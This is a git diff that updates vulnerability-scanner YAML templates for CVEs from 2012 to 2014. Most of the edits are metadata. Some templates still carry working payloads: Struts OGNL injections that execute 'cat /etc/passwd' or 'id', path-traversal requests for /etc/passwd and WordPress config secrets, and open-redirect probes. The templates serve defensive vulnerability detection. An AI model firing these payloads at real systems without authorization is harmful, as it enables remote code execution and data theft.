http://web.archive.org/web/20210121232008/https://www.securityfocus.com/bid/56343/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N + cvss-score: 6.4 cve-id: CVE-2012-4940 cwe-id: CWE-22 - cvss-score: 6.4 - tags: edb,cve,cve2012,axigen,lfi,mail + epss-score: 0.06126 + cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: gecad + product: axigen_free_mail_server + tags: edb,cve,cve2012,axigen,lfi,mail http: - method: GET diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 0352e782ec..93039811cc 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -1,4 +1,5 @@ id: CVE-2012-4982 + info: name: Forescout CounterACT 6.3.4.1 - Open Redirect author: ctflearner @@ -9,14 +10,18 @@ info: - https://www.exploit-db.com/exploits/38062 - https://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html - https://nvd.nist.gov/vuln/detail/CVE-2012-4982 + - http://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-4982 cwe-id: CWE-20 + epss-score: 0.00748 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: forescout + product: counteract tags: cve,cve2012,redirect,forescout,counteract http: diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 5b2a70c3e3..f7419978b7 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -12,14 +12,17 @@ info: - http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/73403 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-5321 cwe-id: CWE-20 + epss-score: 0.02634 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"tiki wiki" + vendor: tiki + product: tikiwiki_cms\/groupware tags: cve,cve2012,redirect,tikiwiki,groupware http: diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index e8d3c9c96b..d40387d9be 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -10,14 +10,19 @@ info: - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/ - http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/74475 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-5913 cwe-id: CWE-79 - tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve + epss-score: 0.0029 + cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wordpress_integrator_project + product: wordpress_integrator + tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve http: - method: GET @@ -27,9 +32,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 1b8e9b0ad9..8a20e43727 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -11,13 +11,16 @@ info: - https://wordpress.org/plugins/age-verification - https://nvd.nist.gov/vuln/detail/CVE-2012-6499 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-6499 cwe-id: CWE-20 + epss-score: 0.01336 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: age_verification_project + product: age_verification tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification http: diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 53e1babe64..f76fea5b8b 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -12,25 +12,30 @@ info: remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C + cvss-score: 9.3 cve-id: CVE-2013-1965 cwe-id: CWE-94 - cvss-score: 9.3 - tags: cve,cve2013,apache,rce,struts,ognl + epss-score: 0.00813 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2013,apache,rce,struts,ognl http: - method: POST path: - "{{BaseURL}}/user.action" - headers: - Content-Type: application/x-www-form-urlencoded + body: | name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index a77c398d2a..fd62f0d0f6 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -10,15 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2013-2248 - https://cwiki.apache.org/confluence/display/WW/S2-017 - http://struts.apache.org/release/2.3.x/docs/s2-017.html + - http://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.html remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cwe-id: CWE-601 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 cve-id: CVE-2013-2248 - tags: cve,cve2013,apache,redirect,struts,edb + cwe-id: CWE-20 + epss-score: 0.97324 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2013,apache,redirect,struts,edb http: - method: GET @@ -27,6 +32,6 @@ http: matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 85eb111bcd..6101561478 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -9,15 +9,21 @@ info: - http://struts.apache.org/release/2.3.x/docs/s2-016.html - https://cwiki.apache.org/confluence/display/WW/S2-016 - https://nvd.nist.gov/vuln/detail/CVE-2013-2251 + - http://archiva.apache.org/security.html + - http://cxsecurity.com/issue/WLB-2014010087 remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C cvss-score: 9.3 cve-id: CVE-2013-2251 cwe-id: CWE-20 - tags: cve,cve2013,rce,struts,apache,ognl,kev + epss-score: 0.97432 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 9 + vendor: apache + product: struts + tags: cve,cve2013,rce,struts,apache,ognl,kev http: - raw: @@ -25,12 +31,10 @@ http: GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 Host: {{Hostname}} @@ -44,13 +48,13 @@ http: matchers-condition: and matchers: - - type: status - condition: or - status: - - 200 - - 400 - - type: regex part: body regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" + + - type: status + status: + - 200 + - 400 + condition: or diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 8288fe467f..c7259eb354 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -10,12 +10,16 @@ info: - https://www.dognaedis.com/vulns/DGS-SEC-16.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2013-2287 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00219 + cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/uploader" + vendor: roberta_bramski + product: uploader tags: cve,cve2013,wordpress,xss,wp-plugin http: @@ -26,9 +30,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index ed6f87803b..03c32b67aa 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -1,4 +1,5 @@ id: CVE-2013-2621 + info: name: Telaen => v1.3.1 - Open Redirect author: ctflearner @@ -14,9 +15,12 @@ info: cvss-score: 6.1 cve-id: CVE-2013-2621 cwe-id: CWE-601 + epss-score: 0.03238 cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: telaen_project + product: telaen tags: cve,cve2012,telaen,redirect http: @@ -26,6 +30,7 @@ http: - "{{BaseURL}}/redir.php?https://interact.sh" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index ede67f8eb4..b0939b8c2e 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -8,15 +8,19 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-3526 - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html - - http://web.archive.org/web/20210123051939/https://www.securityfocus.com/bid/58948/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/83311 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-3526 cwe-id: CWE-79 + epss-score: 0.00431 + cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/trafficanalyzer" + vendor: wptrafficanalyzer + product: trafficanalyzer tags: packetstorm,cve,cve2013,wordpress,xss,wp-plugin http: @@ -27,9 +31,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index afa402a23a..cd199f9b77 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -10,14 +10,19 @@ info: - https://www.exploit-db.com/exploits/38802 - https://www.oracle.com/security-alerts/cpuoct2013.html - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html + - http://rhn.redhat.com/errata/RHSA-2014-0029.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2013-3827 cwe-id: NVD-CWE-noinfo - tags: edb,cve,cve2013,lfi,javafaces,oracle + epss-score: 0.1225 + cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* metadata: max-request: 10 + vendor: oracle + product: fusion_middleware + tags: edb,cve,cve2013,lfi,javafaces,oracle http: - method: GET @@ -34,13 +39,14 @@ http: - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." stop-at-first-match: true + matchers-condition: and matchers: - type: word + part: body words: - "" - part: body condition: and - type: status diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 3c237ea63a..163112e734 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -9,15 +9,21 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2013-4117 - http://openwall.com/lists/oss-security/2013/07/11/11 - http://seclists.org/bugtraq/2013/Jul/17 + - http://exploit.iedb.ir/exploits-177.html + - http://packetstormsecurity.com/files/122259/WordPress-Category-Grid-View-Gallery-XSS.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-4117 cwe-id: CWE-79 + epss-score: 0.01217 + cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" - tags: cve2013,wordpress,xss,wp-plugin,seclists,cve + vendor: anshul_sharma + product: category-grid-view-gallery + tags: seclists,packetstorm,cve2013,wordpress,xss,wp-plugin,cve http: - method: GET @@ -27,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 8ce8d38550..4ebcddd057 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -10,15 +10,20 @@ info: - https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html - https://seclists.org/bugtraq/2013/Jul/160 - https://www.htbridge.com/advisory/HTB23162 + - http://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html remediation: Upgrade to Duplicator 0.4.5 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-4625 cwe-id: CWE-79 + epss-score: 0.01062 + cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/duplicator" + vendor: cory_lamle + product: duplicator tags: seclists,cve,cve2013,wordpress,xss,wp-plugin,packetstorm http: @@ -29,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index 9174141042..bec4181ac9 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -3,21 +3,24 @@ id: CVE-2013-5528 info: name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 reference: - https://www.exploit-db.com/exploits/40887 - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528 - - http://web.archive.org/web/20210122130958/https://www.securityfocus.com/bid/62960/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N cvss-score: 4 cve-id: CVE-2013-5528 cwe-id: CWE-22 - tags: cve,cve2013,lfi,cisco,edb + epss-score: 0.00442 + cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: unified_communications_manager + tags: cve,cve2013,lfi,cisco,edb http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 3ba4a66f34..76c2b6ae72 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -3,20 +3,25 @@ id: CVE-2013-5979 info: name: Xibo 1.2.2/1.4.1 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. reference: - https://www.exploit-db.com/exploits/26955 - https://nvd.nist.gov/vuln/detail/CVE-2013-5979 - https://bugs.launchpad.net/xibo/+bug/1093967 + - http://www.baesystemsdetica.com.au/Research/Advisories/Xibo-Directory-Traversal-Vulnerability-(DS-2013-00 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2013-5979 cwe-id: CWE-22 - tags: cve,cve2013,lfi,edb + epss-score: 0.07589 + cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: springsignage + product: xibo + tags: cve,cve2013,lfi,edb http: - method: GET @@ -25,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index ed991df906..1630af6d2e 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -13,14 +13,19 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 - https://nvd.nist.gov/vuln/detail/CVE-2013-6281 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2013-6281 cwe-id: CWE-79 + epss-score: 0.00209 + cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: max-request: 1 google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet verified: true + framework: wordpress + vendor: dhtmlx + product: dhtmlxspreadsheet tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin http: diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index febdda4444..05d42a4de2 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -3,21 +3,26 @@ id: CVE-2013-7091 info: name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion author: rubina119 - severity: critical + severity: medium description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-7091 - https://www.exploit-db.com/exploits/30085 - https://www.exploit-db.com/exploits/30472 - http://www.exploit-db.com/exploits/30085 + - http://packetstormsecurity.com/files/124321 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2013-7091 cwe-id: CWE-22 - tags: zimbra,lfi,edb,cve,cve2013 + epss-score: 0.97375 + cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: synacor + product: zimbra_collaboration_suite + tags: packetstorm,zimbra,lfi,edb,cve,cve2013 http: - method: GET @@ -26,6 +31,7 @@ http: - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00" stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 2e99af565b..ddcf90e79c 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -3,21 +3,26 @@ id: CVE-2013-7240 info: name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. reference: - https://www.exploit-db.com/exploits/38936 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/ - http://seclists.org/oss-sec/2013/q4/570 + - http://seclists.org/oss-sec/2013/q4/566 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2013-7240 cwe-id: CWE-22 + epss-score: 0.19842 + cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/advanced-dewplayer/" + vendor: westerndeal + product: advanced_dewplayer tags: wp-plugin,lfi,edb,seclists,cve,cve2013,wordpress http: @@ -28,12 +33,12 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_HOST" - "The base configurations of the WordPress" - part: body condition: and - type: status diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 7b515b8b66..010ecc9527 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -17,11 +17,13 @@ info: cvss-score: 9.8 cve-id: CVE-2013-7285 cwe-id: CWE-78 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-score: 0.33561 - tags: cve,cve2013,xstream,deserialization,rce,oast + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve,cve2013,xstream,deserialization,rce,oast http: - raw: diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 7d9ba4d2df..99aebf0b90 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -9,14 +9,19 @@ info: - https://www.exploit-db.com/exploits/30865 - https://nvd.nist.gov/vuln/detail/CVE-2014-10037 - http://www.exploit-db.com/exploits/30865 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/90582 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2014-10037 cwe-id: CWE-22 - tags: cve,cve2014,lfi,edb + epss-score: 0.22143 + cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: domphp + product: domphp + tags: cve,cve2014,lfi,edb http: - method: GET @@ -25,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 345113c27a..df2b61659a 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2014-1203 cwe-id: CWE-77 - cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* epss-score: 0.02045 - tags: seclists,rce,eyou + cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: eyou + product: eyou + tags: seclists,rce,eyou http: - raw: @@ -32,9 +34,9 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index 17804f4e58..3225be3f89 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -3,7 +3,7 @@ id: CVE-2014-2321 info: name: ZTE Cable Modem Web Shell author: geeknik - severity: high + severity: critical description: | ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. reference: @@ -11,14 +11,19 @@ info: - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ - https://nvd.nist.gov/vuln/detail/CVE-2014-2321 - http://www.kb.cert.org/vuls/id/600724 + - http://www.myxzy.com/post-411.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2014-2321 cwe-id: CWE-264 - tags: iot,cve,cve2014,zte + epss-score: 0.96364 + cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zte + product: f460 + tags: iot,cve,cve2014,zte http: - method: GET @@ -28,10 +33,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "please input shell command" - "ZTE Corporation. All rights reserved" - part: body condition: and - type: status diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 54d5c2eb08..1c6d087629 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -10,15 +10,19 @@ info: - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt - http://www.lighttpd.net/2014/3/12/1.4.35/ - http://seclists.org/oss-sec/2014/q1/561 + - http://jvn.jp/en/jp/JVN37417423/index.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2014-2323 cwe-id: CWE-89 - epss-score: 0.97012 - tags: lighttpd,injection,seclists,cve,cve2014,sqli + epss-score: 0.96912 + cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: lighttpd + product: lighttpd + tags: lighttpd,injection,seclists,cve,cve2014,sqli http: - raw: diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 7119fedfae..d01b7cc8fd 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -3,7 +3,7 @@ id: CVE-2014-2383 info: name: Dompdf < v0.6.0 - Local File 